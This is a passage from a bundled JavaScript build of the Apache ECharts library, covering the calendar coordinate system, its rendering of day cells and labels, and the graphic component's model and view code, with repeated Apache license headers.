1);\n        // The bias can not over a month, so just compare date.\n        if (date.getDate() !== endDateNum) {\n            var sign = date.getTime() - range[1].time > 0 ? 1 : -1;\n            while (date.getDate() !== endDateNum && (date.getTime() - range[1].time) * sign > 0) {\n                allDay -= sign;\n                date.setDate(startDateNum + allDay - 1);\n            }\n        }\n\n        var weeks = Math.floor((allDay + range[0].day + 6) / 7);\n        var nthWeek = reversed ? -weeks + 1 : weeks - 1;\n\n        reversed && range.reverse();\n\n        return {\n            range: [range[0].formatedDate, range[1].formatedDate],\n            start: range[0],\n            end: range[1],\n            allDay: allDay,\n            weeks: weeks,\n            // From 0.\n            nthWeek: nthWeek,\n            fweek: range[0].day,\n            lweek: range[1].day\n        };\n    },\n\n    /**\n     * get date by nthWeeks and week day in range\n     *\n     * @private\n     * @param  {number} nthWeek the week\n     * @param  {number} day   the week day\n     * @param  {Array} range [d1, d2]\n     * @return {Object}\n     */\n    _getDateByWeeksAndDay: function (nthWeek, day, range) {\n        var rangeInfo = this._getRangeInfo(range);\n\n        if (nthWeek > rangeInfo.weeks\n            || (nthWeek === 0 && day < rangeInfo.fweek)\n            || (nthWeek === rangeInfo.weeks && day > rangeInfo.lweek)\n        ) {\n            return false;\n        }\n\n        var nthDay = (nthWeek - 1) * 7 - rangeInfo.fweek + day;\n        var date = new Date(rangeInfo.start.time);\n        date.setDate(rangeInfo.start.d + nthDay);\n\n        return this.getDateInfo(date);\n    }\n};\n\nCalendar.dimensions = Calendar.prototype.dimensions;\n\nCalendar.getDimensionsInfo = Calendar.prototype.getDimensionsInfo;\n\nCalendar.create = function (ecModel, api) {\n    var calendarList = [];\n\n    ecModel.eachComponent('calendar', function (calendarModel) {\n        var calendar = new Calendar(calendarModel, ecModel, api);\n        calendarList.push(calendar);\n        calendarModel.coordinateSystem = calendar;\n    });\n\n    ecModel.eachSeries(function (calendarSeries) {\n        if (calendarSeries.get('coordinateSystem') === 'calendar') {\n            // Inject coordinate system\n            calendarSeries.coordinateSystem = calendarList[calendarSeries.get('calendarIndex') || 0];\n        }\n    });\n    return calendarList;\n};\n\nfunction doConvert$2(methodName, ecModel, finder, value) {\n    var calendarModel = finder.calendarModel;\n    var seriesModel = finder.seriesModel;\n\n    var coordSys = calendarModel\n        ? calendarModel.coordinateSystem\n        : seriesModel\n        ? seriesModel.coordinateSystem\n        : null;\n\n    return coordSys === this ? coordSys[methodName](value) : null;\n}\n\nCoordinateSystemManager.register('calendar', Calendar);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar CalendarModel = ComponentModel.extend({\n\n    type: 'calendar',\n\n    /**\n     * @type {module:echarts/coord/calendar/Calendar}\n     */\n    coordinateSystem: null,\n\n    defaultOption: {\n        zlevel: 0,\n        z: 2,\n        left: 80,\n        top: 60,\n\n        cellSize: 20,\n\n        // horizontal vertical\n        orient: 'horizontal',\n\n        // month separate line style\n        splitLine: {\n            show: true,\n            lineStyle: {\n                color: '#000',\n                width: 1,\n                type: 'solid'\n            }\n        },\n\n        // rect style  temporarily unused emphasis\n        itemStyle: {\n            color: '#fff',\n            borderWidth: 1,\n            borderColor: '#ccc'\n        },\n\n        // week text style\n        dayLabel: {\n            show: true,\n\n            // a week first day\n            firstDay: 0,\n\n            // start end\n            position: 'start',\n            margin: '50%', // 50% of cellSize\n            nameMap: 'en',\n            color: '#000'\n        },\n\n        // month text style\n        monthLabel: {\n            show: true,\n\n            // start end\n            position: 'start',\n            margin: 5,\n\n            // center or left\n            align: 'center',\n\n            // cn en []\n            nameMap: 'en',\n            formatter: null,\n            color: '#000'\n        },\n\n        // year text style\n        yearLabel: {\n            show: true,\n\n            // top bottom left right\n            position: null,\n            margin: 30,\n            formatter: null,\n            color: '#ccc',\n            fontFamily: 'sans-serif',\n            fontWeight: 'bolder',\n            fontSize: 20\n        }\n    },\n\n    /**\n     * @override\n     */\n    init: function (option, parentModel, ecModel, extraOpt) {\n        var inputPositionParams = getLayoutParams(option);\n\n        CalendarModel.superApply(this, 'init', arguments);\n\n        mergeAndNormalizeLayoutParams(option, inputPositionParams);\n    },\n\n    /**\n     * @override\n     */\n    mergeOption: function (option, extraOpt) {\n        CalendarModel.superApply(this, 'mergeOption', arguments);\n\n        mergeAndNormalizeLayoutParams(this.option, option);\n    }\n});\n\nfunction mergeAndNormalizeLayoutParams(target, raw) {\n    // Normalize cellSize\n    var cellSize = target.cellSize;\n\n    if (!isArray(cellSize)) {\n        cellSize = target.cellSize = [cellSize, cellSize];\n    }\n    else if (cellSize.length === 1) {\n        cellSize[1] = cellSize[0];\n    }\n\n    var ignoreSize = map([0, 1], function (hvIdx) {\n        // If user have set `width` or both `left` and `right`, cellSize\n        // will be automatically set to 'auto', otherwise the default\n        // setting of cellSize will make `width` setting not work.\n        if (sizeCalculable(raw, hvIdx)) {\n            cellSize[hvIdx] = 'auto';\n        }\n        return cellSize[hvIdx] != null && cellSize[hvIdx] !== 'auto';\n    });\n\n    mergeLayoutParam(target, raw, {\n        type: 'box', ignoreSize: ignoreSize\n    });\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar MONTH_TEXT = {\n    EN: [\n        'Jan', 'Feb', 'Mar',\n        'Apr', 'May', 'Jun',\n        'Jul', 'Aug', 'Sep',\n        'Oct', 'Nov', 'Dec'\n    ],\n    CN: [\n        '一月', '二月', '三月',\n        '四月', '五月', '六月',\n        '七月', '八月', '九月',\n        '十月', '十一月', '十二月'\n    ]\n};\n\nvar WEEK_TEXT = {\n    EN: ['S', 'M', 'T', 'W', 'T', 'F', 'S'],\n    CN: ['日', '一', '二', '三', '四', '五', '六']\n};\n\nextendComponentView({\n\n    type: 'calendar',\n\n    /**\n     * top/left line points\n     *  @private\n     */\n    _tlpoints: null,\n\n    /**\n     * bottom/right line points\n     *  @private\n     */\n    _blpoints: null,\n\n    /**\n     * first day of month\n     *  @private\n     */\n    _firstDayOfMonth: null,\n\n    /**\n     * first day point of month\n     *  @private\n     */\n    _firstDayPoints: null,\n\n    render: function (calendarModel, ecModel, api) {\n\n        var group = this.group;\n\n        group.removeAll();\n\n        var coordSys = calendarModel.coordinateSystem;\n\n        // range info\n        var rangeData = coordSys.getRangeInfo();\n        var orient = coordSys.getOrient();\n\n        this._renderDayRect(calendarModel, rangeData, group);\n\n        // _renderLines must be called prior to following function\n        this._renderLines(calendarModel, rangeData, orient, group);\n\n        this._renderYearText(calendarModel, rangeData, orient, group);\n\n        this._renderMonthText(calendarModel, orient, group);\n\n        this._renderWeekText(calendarModel, rangeData, orient, group);\n    },\n\n    // render day rect\n    _renderDayRect: function (calendarModel, rangeData, group) {\n        var coordSys = calendarModel.coordinateSystem;\n        var itemRectStyleModel = calendarModel.getModel('itemStyle').getItemStyle();\n        var sw = coordSys.getCellWidth();\n        var sh = coordSys.getCellHeight();\n\n        for (var i = rangeData.start.time;\n            i <= rangeData.end.time;\n            i = coordSys.getNextNDay(i, 1).time\n        ) {\n\n            var point = coordSys.dataToRect([i], false).tl;\n\n            // every rect\n            var rect = new Rect({\n                shape: {\n                    x: point[0],\n                    y: point[1],\n                    width: sw,\n                    height: sh\n                },\n                cursor: 'default',\n                style: itemRectStyleModel\n            });\n\n            group.add(rect);\n        }\n\n    },\n\n    // render separate line\n    _renderLines: function (calendarModel, rangeData, orient, group) {\n\n        var self = this;\n\n        var coordSys = calendarModel.coordinateSystem;\n\n        var lineStyleModel = calendarModel.getModel('splitLine.lineStyle').getLineStyle();\n        var show = calendarModel.get('splitLine.show');\n\n        var lineWidth = lineStyleModel.lineWidth;\n\n        this._tlpoints = [];\n        this._blpoints = [];\n        this._firstDayOfMonth = [];\n        this._firstDayPoints = [];\n\n\n        var firstDay = rangeData.start;\n\n        for (var i = 0; firstDay.time <= rangeData.end.time; i++) {\n            addPoints(firstDay.formatedDate);\n\n            if (i === 0) {\n                firstDay = coordSys.getDateInfo(rangeData.start.y + '-' + rangeData.start.m);\n            }\n\n            var date = firstDay.date;\n            date.setMonth(date.getMonth() + 1);\n            firstDay = coordSys.getDateInfo(date);\n        }\n\n        addPoints(coordSys.getNextNDay(rangeData.end.time, 1).formatedDate);\n\n        function addPoints(date) {\n\n            self._firstDayOfMonth.push(coordSys.getDateInfo(date));\n            self._firstDayPoints.push(coordSys.dataToRect([date], false).tl);\n\n            var points = self._getLinePointsOfOneWeek(calendarModel, date, orient);\n\n            self._tlpoints.push(points[0]);\n            self._blpoints.push(points[points.length - 1]);\n\n            show && self._drawSplitline(points, lineStyleModel, group);\n        }\n\n\n        // render top/left line\n        show && this._drawSplitline(self._getEdgesPoints(self._tlpoints, lineWidth, orient), lineStyleModel, group);\n\n        // render bottom/right line\n        show && this._drawSplitline(self._getEdgesPoints(self._blpoints, lineWidth, orient), lineStyleModel, group);\n\n    },\n\n    // get points at both ends\n    _getEdgesPoints: function (points, lineWidth, orient) {\n        var rs = [points[0].slice(), points[points.length - 1].slice()];\n        var idx = orient === 'horizontal' ? 0 : 1;\n\n        // both ends of the line are extend half lineWidth\n        rs[0][idx] = rs[0][idx] - lineWidth / 2;\n        rs[1][idx] = rs[1][idx] + lineWidth / 2;\n\n        return rs;\n    },\n\n    // render split line\n    _drawSplitline: function (points, lineStyleModel, group) {\n\n        var poyline = new Polyline({\n            z2: 20,\n            shape: {\n                points: points\n            },\n            style: lineStyleModel\n        });\n\n        group.add(poyline);\n    },\n\n    // render month line of one week points\n    _getLinePointsOfOneWeek: function (calendarModel, date, orient) {\n\n        var coordSys = calendarModel.coordinateSystem;\n        date = coordSys.getDateInfo(date);\n\n        var points = [];\n\n        for (var i = 0; i < 7; i++) {\n\n            var tmpD = coordSys.getNextNDay(date.time, i);\n            var point = coordSys.dataToRect([tmpD.time], false);\n\n            points[2 * tmpD.day] = point.tl;\n            points[2 * tmpD.day + 1] = point[orient === 'horizontal' ? 'bl' : 'tr'];\n        }\n\n        return points;\n\n    },\n\n    _formatterLabel: function (formatter, params) {\n\n        if (typeof formatter === 'string' && formatter) {\n            return formatTplSimple(formatter, params);\n        }\n\n        if (typeof formatter === 'function') {\n            return formatter(params);\n        }\n\n        return params.nameMap;\n\n    },\n\n    _yearTextPositionControl: function (textEl, point, orient, position, margin) {\n\n        point = point.slice();\n        var aligns = ['center', 'bottom'];\n\n        if (position === 'bottom') {\n            point[1] += margin;\n            aligns = ['center', 'top'];\n        }\n        else if (position === 'left') {\n            point[0] -= margin;\n        }\n        else if (position === 'right') {\n            point[0] += margin;\n            aligns = ['center', 'top'];\n        }\n        else { // top\n            point[1] -= margin;\n        }\n\n        var rotate = 0;\n        if (position === 'left' || position === 'right') {\n            rotate = Math.PI / 2;\n        }\n\n        return {\n            rotation: rotate,\n            position: point,\n            style: {\n                textAlign: aligns[0],\n                textVerticalAlign: aligns[1]\n            }\n        };\n    },\n\n    // render year\n    _renderYearText: function (calendarModel, rangeData, orient, group) {\n        var yearLabel = calendarModel.getModel('yearLabel');\n\n        if (!yearLabel.get('show')) {\n            return;\n        }\n\n        var margin = yearLabel.get('margin');\n        var pos = yearLabel.get('position');\n\n        if (!pos) {\n            pos = orient !== 'horizontal' ? 'top' : 'left';\n        }\n\n        var points = [this._tlpoints[this._tlpoints.length - 1], this._blpoints[0]];\n        var xc = (points[0][0] + points[1][0]) / 2;\n        var yc = (points[0][1] + points[1][1]) / 2;\n\n        var idx = orient === 'horizontal' ? 0 : 1;\n\n        var posPoints = {\n            top: [xc, points[idx][1]],\n            bottom: [xc, points[1 - idx][1]],\n            left: [points[1 - idx][0], yc],\n            right: [points[idx][0], yc]\n        };\n\n        var name = rangeData.start.y;\n\n        if (+rangeData.end.y > +rangeData.start.y) {\n            name = name + '-' + rangeData.end.y;\n        }\n\n        var formatter = yearLabel.get('formatter');\n\n        var params = {\n            start: rangeData.start.y,\n            end: rangeData.end.y,\n            nameMap: name\n        };\n\n        var content = this._formatterLabel(formatter, params);\n\n        var yearText = new Text({z2: 30});\n        setTextStyle(yearText.style, yearLabel, {text: content}),\n        yearText.attr(this._yearTextPositionControl(yearText, posPoints[pos], orient, pos, margin));\n\n        group.add(yearText);\n    },\n\n    _monthTextPositionControl: function (point, isCenter, orient, position, margin) {\n        var align = 'left';\n        var vAlign = 'top';\n        var x = point[0];\n        var y = point[1];\n\n        if (orient === 'horizontal') {\n            y = y + margin;\n\n            if (isCenter) {\n                align = 'center';\n            }\n\n            if (position === 'start') {\n                vAlign = 'bottom';\n            }\n        }\n        else {\n            x = x + margin;\n\n            if (isCenter) {\n                vAlign = 'middle';\n            }\n\n            if (position === 'start') {\n                align = 'right';\n            }\n        }\n\n        return {\n            x: x,\n            y: y,\n            textAlign: align,\n            textVerticalAlign: vAlign\n        };\n    },\n\n    // render month and year text\n    _renderMonthText: function (calendarModel, orient, group) {\n        var monthLabel = calendarModel.getModel('monthLabel');\n\n        if (!monthLabel.get('show')) {\n            return;\n        }\n\n        var nameMap = monthLabel.get('nameMap');\n        var margin = monthLabel.get('margin');\n        var pos = monthLabel.get('position');\n        var align = monthLabel.get('align');\n\n        var termPoints = [this._tlpoints, this._blpoints];\n\n        if (isString(nameMap)) {\n            nameMap = MONTH_TEXT[nameMap.toUpperCase()] || [];\n        }\n\n        var idx = pos === 'start' ? 0 : 1;\n        var axis = orient === 'horizontal' ? 0 : 1;\n        margin = pos === 'start' ? -margin : margin;\n        var isCenter = (align === 'center');\n\n        for (var i = 0; i < termPoints[idx].length - 1; i++) {\n\n            var tmp = termPoints[idx][i].slice();\n            var firstDay = this._firstDayOfMonth[i];\n\n            if (isCenter) {\n                var firstDayPoints = this._firstDayPoints[i];\n                tmp[axis] = (firstDayPoints[axis] + termPoints[0][i + 1][axis]) / 2;\n            }\n\n            var formatter = monthLabel.get('formatter');\n            var name = nameMap[+firstDay.m - 1];\n            var params = {\n                yyyy: firstDay.y,\n                yy: (firstDay.y + '').slice(2),\n                MM: firstDay.m,\n                M: +firstDay.m,\n                nameMap: name\n            };\n\n            var content = this._formatterLabel(formatter, params);\n\n            var monthText = new Text({z2: 30});\n            extend(\n                setTextStyle(monthText.style, monthLabel, {text: content}),\n                this._monthTextPositionControl(tmp, isCenter, orient, pos, margin)\n            );\n\n            group.add(monthText);\n        }\n    },\n\n    _weekTextPositionControl: function (point, orient, position, margin, cellSize) {\n        var align = 'center';\n        var vAlign = 'middle';\n        var x = point[0];\n        var y = point[1];\n        var isStart = position === 'start';\n\n        if (orient === 'horizontal') {\n            x = x + margin + (isStart ? 1 : -1) * cellSize[0] / 2;\n            align = isStart ? 'right' : 'left';\n        }\n        else {\n            y = y + margin + (isStart ? 1 : -1) * cellSize[1] / 2;\n            vAlign = isStart ? 'bottom' : 'top';\n        }\n\n        return {\n            x: x,\n            y: y,\n            textAlign: align,\n            textVerticalAlign: vAlign\n        };\n    },\n\n    // render weeks\n    _renderWeekText: function (calendarModel, rangeData, orient, group) {\n        var dayLabel = calendarModel.getModel('dayLabel');\n\n        if (!dayLabel.get('show')) {\n            return;\n        }\n\n        var coordSys = calendarModel.coordinateSystem;\n        var pos = dayLabel.get('position');\n        var nameMap = dayLabel.get('nameMap');\n        var margin = dayLabel.get('margin');\n        var firstDayOfWeek = coordSys.getFirstDayOfWeek();\n\n        if (isString(nameMap)) {\n            nameMap = WEEK_TEXT[nameMap.toUpperCase()] || [];\n        }\n\n        var start = coordSys.getNextNDay(\n            rangeData.end.time, (7 - rangeData.lweek)\n        ).time;\n\n        var cellSize = [coordSys.getCellWidth(), coordSys.getCellHeight()];\n        margin = parsePercent$1(margin, cellSize[orient === 'horizontal' ? 0 : 1]);\n\n        if (pos === 'start') {\n            start = coordSys.getNextNDay(\n                rangeData.start.time, -(7 + rangeData.fweek)\n            ).time;\n            margin = -margin;\n        }\n\n        for (var i = 0; i < 7; i++) {\n\n            var tmpD = coordSys.getNextNDay(start, i);\n            var point = coordSys.dataToRect([tmpD.time], false).center;\n            var day = i;\n            day = Math.abs((i + firstDayOfWeek) % 7);\n            var weekText = new Text({z2: 30});\n\n            extend(\n                setTextStyle(weekText.style, dayLabel, {text: nameMap[day]}),\n                this._weekTextPositionControl(point, orient, pos, margin, cellSize)\n            );\n            group.add(weekText);\n        }\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar _nonShapeGraphicElements = {\n\n    // Reserved but not supported in graphic component.\n    path: null,\n    compoundPath: null,\n\n    // Supported in graphic component.\n    group: Group,\n    image: ZImage,\n    text: Text\n};\n\n// -------------\n// Preprocessor\n// -------------\n\nregisterPreprocessor(function (option) {\n    var graphicOption = option.graphic;\n\n    // Convert\n    // {graphic: [{left: 10, type: 'circle'}, ...]}\n    // or\n    // {graphic: {left: 10, type: 'circle'}}\n    // to\n    // {graphic: [{elements: [{left: 10, type: 'circle'}, ...]}]}\n    if (isArray(graphicOption)) {\n        if (!graphicOption[0] || !graphicOption[0].elements) {\n            option.graphic = [{elements: graphicOption}];\n        }\n        else {\n            // Only one graphic instance can be instantiated. (We dont\n            // want that too many views are created in echarts._viewMap)\n            option.graphic = [option.graphic[0]];\n        }\n    }\n    else if (graphicOption && !graphicOption.elements) {\n        option.graphic = [{elements: [graphicOption]}];\n    }\n});\n\n// ------\n// Model\n// ------\n\nvar GraphicModel = extendComponentModel({\n\n    type: 'graphic',\n\n    defaultOption: {\n\n        // Extra properties for each elements:\n        //\n        // left/right/top/bottom: (like 12, '22%', 'center', default undefined)\n        //      If left/rigth is set, shape.x/shape.cx/position will not be used.\n        //      If top/bottom is set, shape.y/shape.cy/position will not be used.\n        //      This mechanism is useful when you want to position a group/element\n        //      against the right side or the center of this container.\n        //\n        // width/height: (can only be pixel value, default 0)\n        //      Only be used to specify contianer(group) size, if needed. And\n        //      can not be percentage value (like '33%'). See the reason in the\n        //      layout algorithm below.\n        //\n        // bounding: (enum: 'all' (default) | 'raw')\n        //      Specify how to calculate boundingRect when locating.\n        //      'all': Get uioned and transformed boundingRect\n        //          from both itself and its descendants.\n        //          This mode simplies confining a group of elements in the bounding\n        //          of their ancester container (e.g., using 'right: 0').\n        //      'raw': Only use the boundingRect of itself and before transformed.\n        //          This mode is similar to css behavior, which is useful when you\n        //          want an element to be able to overflow its container. (Consider\n        //          a rotated circle needs to be located in a corner.)\n        // info: custom info. enables user to mount some info on elements and use them\n        //      in event handlers. Update them only when user specified, otherwise, remain.\n\n        // Note: elements is always behind its ancestors in this elements array.\n        elements: [],\n        parentId: null\n    },\n\n    /**\n     * Save el options for the sake of the performance (only update modified graphics).\n     * The order is the same as those in option. (ancesters -> descendants)\n     *\n     * @private\n     * @type {Array.<Object>}\n     */\n    _elOptionsToUpdate: null,\n\n    /**\n     * @override\n     */\n    mergeOption: function (option) {\n        // Prevent default merge to elements\n        var elements = this.option.elements;\n        this.option.elements = null;\n\n        GraphicModel.superApply(this, 'mergeOption', arguments);\n\n        this.option.elements = elements;\n    },\n\n    /**\n     * @override\n     */\n    optionUpdated: function (newOption, isInit) {\n        var thisOption = this.option;\n        var newList = (isInit ? thisOption : newOption).elements;\n        var existList = thisOption.elements = isInit ? [] : thisOption.elements;\n\n        var flattenedList = [];\n        this._flatten(newList, flattenedList);\n\n        var mappingResult = mappingToExists(existList, flattenedList);\n        makeIdAndName(mappingResult);\n\n        // Clear elOptionsToUpdate\n        var elOptionsToUpdate = this._elOptionsToUpdate = [];\n\n        each$1(mappingResult, function (resultItem, index) {\n            var newElOption = resultItem.option;\n\n            if (__DEV__) {\n                assert$1(\n                    isObject$1(newElOption) || resultItem.exist,\n                    'Empty graphic option definition'\n                );\n            }\n\n            if (!newElOption) {\n                return;\n            }\n\n            elOptionsToUpdate.push(newElOption);\n\n            setKeyInfoToNewElOption(resultItem, newElOption);\n\n            mergeNewElOptionToExist(existList, index, newElOption);\n\n            setLayoutInfoToExist(existList[index], newElOption);\n\n        }, this);\n\n        // Clean\n        for (var i = existList.length - 1; i >= 0; i--) {\n            if (existList[i] == null) {\n                existList.splice(i, 1);\n            }\n            else {\n                // $action should be volatile, otherwise option gotten from\n                // `getOption` will contain unexpected $action.\n                delete existList[i].$action;\n            }\n        }\n    },\n\n    /**\n     * Convert\n     * [{\n     *  type: 'group',\n     *  id: 'xx',\n     *  children: [{type: 'circle'}, {type: 'polygon'}]\n     * }]\n     * to\n     * [\n     *  {type: 'group', id: 'xx'},\n     *  {type: 'circle', parentId: 'xx'},\n     *  {type: 'polygon', parentId: 'xx'}\n     * ]\n     *\n     * @private\n     * @param {Array.<Object>} optionList option list\n     * @param {Array.<Object>} result result of flatten\n     * @param {Object} parentOption parent option\n     */\n    _flatten: function (optionList, result, parentOption) {\n        each$1(optionList, function (option) {\n            if (!option) {\n                return;\n            }\n\n            if (parentOption) {\n                option.parentOption = parentOption;\n            }\n\n            result.push(option);\n\n            var children = option.children;\n            if (option.type === 'group' && children) {\n                this._flatten(children, result, option);\n            }\n            // Deleting for JSON output, and for not affecting group creation.\n            delete option.children;\n        }, this);\n    },\n\n    // FIXME\n    // Pass to view using payload? setOption has a payload?\n    useElOptionsToUpdate: function () {\n        var els = this._elOptionsToUpdate;\n        // Clear to avoid render duplicately when zooming.\n        this._elOptionsToUpdate = null;\n        return els;\n    }\n});\n\n// -----\n// View\n// -----\n\nextendComponentView({\n\n    type: 'graphic',\n\n    /**\n     * @override\n     */\n    init: function (ecModel, api) {\n\n        /**\n         * @private\n         * @type {module:zrender/core/util.HashMap}\n         */\n        this._elMap = createHashMap();\n\n        /**\n         * @private\n         * @type {module:echarts/graphic/GraphicModel}\n         */\n        this._lastGraphicModel;\n    },\n\n    /**\n     * @override\n     */\n    render: function (graphicModel, ecModel, api) {\n\n        // Having leveraged between use cases and algorithm complexity, a very\n        // simple layout mechanism is used:\n        // The size(width/height) can be determined by itself or its parent (not\n        // implemented yet), but can not by its children. (Top-down travel)\n        // The location(x/y) can be determined by the bounding rect of itself\n        // (can including its descendants or not) and the size of its parent.\n        // (Bottom-up travel)\n\n        // When `chart.clear()` or `chart.setOption({...}, true)` with the same id,\n        // view will be reused.\n        if (graphicModel !== this._lastGraphicModel) {\n            this._clear();\n        }\n        this._lastGraphicModel = graphicModel;\n\n        this._updateElements(graphicModel);\n        this._relocate(graphicModel, api);\n    },\n\n    /**\n     * Update graphic elements.\n     *\n     * @private\n     * @param {Object} graphicModel graphic model\n     */\n    _updateElements: function (graphicModel) {\n        var elOptionsToUpdate = graphicModel.useElOptionsToUpdate();\n\n        if (!elOptionsToUpdate) {\n            return;\n        }\n\n        var elMap = this._elMap;\n        var rootGroup = this.group;\n\n        // Top-down tranverse to assign graphic settings to each elements.\n        each$1(elOptionsToUpdate, function (elOption) {\n            var $action = elOption.$action;\n            var id = elOption.id;\n            var existEl = elMap.get(id);\n            var parentId = elOption.parentId;\n            var targetElParent = parentId != null ? elMap.get(parentId) : rootGroup;\n\n            var elOptionStyle = elOption.style;\n            if (elOption.type === 'text' && elOptionStyle) {\n                // In top/bottom mode, textVerticalAlign should not be used, which cause\n                // inaccurately locating.\n                if (elOption.hv && elOption.hv[1]) {\n                    elOptionStyle.textVerticalAlign = elOptionStyle.textBaseline = null;\n                }\n\n                // Compatible with previous setting: both support fill and textFill,\n                // stroke and textStroke.\n                !elOptionStyle.hasOwnProperty('textFill') && elOptionStyle.fill && (\n                    elOptionStyle.textFill = elOptionStyle.fill\n                );\n                !elOptionStyle.hasOwnProperty('textStroke') && elOptionStyle.stroke && (\n                    elOptionStyle.textStroke = elOptionStyle.stroke\n                );\n            }\n\n            // Remove unnecessary props to avoid potential problems.\n            var elOptionCleaned = getCleanedElOption(elOption);\n\n            // For simple, do not support parent change, otherwise reorder is needed.\n            if (__DEV__) {\n                existEl && assert$1(\n                    targetElParent === existEl.parent,\n                    'Changing parent is not supported.'\n                );\n            }\n\n            if (!$action || $action === 'merge') {\n                existEl\n                    ? existEl.attr(elOptionCleaned)\n                    : createEl$1(id, targetElParent, elOptionCleaned, elMap);\n            }\n            else if ($action === 'replace') {\n                removeEl(existEl, elMap);\n                createEl$1(id, targetElParent, elOptionCleaned, elMap);\n            }\n            else if ($action === 'remove') {\n                removeEl(existEl, elMap);\n            }\n\n            var el = elMap.get(id);\n            if (el) {\n                el.__ecGraphicWidthOption = elOption.width;\n                el.__ecGraphicHeightOption = elOption.height;\n                setEventData(el, graphicModel, elOption);\n            }\n        });\n    },\n\n    /**\n     * Locate graphic elements.\n     *\n     * @private\n     * @param {Object} graphicModel graphic model\n     * @param {module:echarts/ExtensionAPI} api extension API\n     */\n    _relocate: function (graphicModel, api) {\n        var elOptions = graphicModel.option.elements;\n        var rootGroup = this.group;\n        var elMap = this._elMap;\n        var apiWidth = api.getWidth();\n        var apiHeight = api.getHeight();\n\n        // Top-down to calculate percentage width/height of group\n        for (var i = 0; i < elOptions.length; i++) {\n            var elOption = elOptions[i];\n            var el = elMap.get(elOption.id);\n\n            if (!el || !el.isGroup) {\n                continue;\n            }\n            var parentEl = el.parent;\n            var isParentRoot = parentEl === rootGroup;\n            // Like 'position:absolut' in css, default 0.\n            el.__ecGraphicWidth = parsePercent$1(\n                el.__ecGraphicWidthOption,\n                isParentRoot ? apiWidth : parentEl.__ecGraphicWidth\n            ) || 0;\n            el.__ecGraphicHeight = parsePercent$1(\n                el.__ecGraphicHeightOption,\n                isParentRoot ? apiHeight : parentEl.__ecGraphicHeight\n            ) || 0;\n        }\n\n        // Bottom-up tranvese all elements (consider ec resize) to locate elements.\n        for (var i = elOptions.length - 1; i >= 0; i--) {\n            var elOption = elOptions[i];\n            var el = elMap.get(elOption.id);\n\n            if (!el) {\n                continue;\n            }\n\n            var parentEl = el.parent;\n            var containerInfo = parentEl === rootGroup\n                ? {\n                    width: apiWidth,\n                    height: apiHeight\n                }\n                : {\n                    width: parentEl.__ecGraphicWidth,\n                    height: parentEl.__ecGraphicHeight\n                };\n\n            // PENDING\n            // Currently, when `bounding: 'all'`, the union bounding rect of the group\n            // does not include the rect of [0, 0, group.width, group.height], which\n            // is probably weird for users. Should we make a break change for it?\n            positionElement(\n                el, elOption, containerInfo, null,\n                {hv: elOption.hv, boundingMode: elOption.bounding}\n            );\n        }\n    },\n\n    /**\n     * Clear all elements.\n     *\n     * @private\n     */\n    _clear: function () {\n        var elMap = this._elMap;\n        elMap.each(function (el) {\n            removeEl(el, elMap);\n        });\n        this._elMap = createHashMap();\n    },\n\n    /**\n     * @override\n     */\n    dispose: function () {\n        this._clear();\n    }\n});\n\nfunction createEl$1(id, targetElParent, elOption, elMap) {\n    var graphicType = elOption.type;\n\n    if (__DEV__) {\n        assert$1(graphicType, 'graphic type MUST be set');\n    }\n\n    var Clz = _nonShapeGraphicElements.hasOwnProperty(graphicType)\n        // Those graphic elements are not shapes. They should not be\n        // overwritten by users, so do them first.\n        ? _nonShapeGraphicElements[graphicType]\n        : getShapeClass(graphicType);\n\n    if (__DEV__) {\n        assert$1(Clz, 'graphic type can not be found');\n    }\n\n    var el = new Clz(elOption);\n    targetElParent.add(el);\n    elMap.set(id, el);\n    el.__ecGraphicId = id;\n}\n\nfunction removeEl(existEl, elMap) {\n    var existElParent = existEl && existEl.parent;\n    if (existElParent) {\n        existEl.type === 'group' && existEl.traverse(function (el) {\n            removeEl(el, elMap);\n        });\n        elMap.removeKey(existEl.__ecGraphicId);\n        existElParent.remove(existEl);\n    }\n}\n\n// Remove unnecessary props to avoid potential problems.\nfunction getCleanedElOption(elOption) {\n    elOption = extend({}, elOption);\n    each$1(\n        ['id', 'parentId', '$action', 'hv', 'bounding'].concat(LOCATION_PARAMS),\n        function (name) 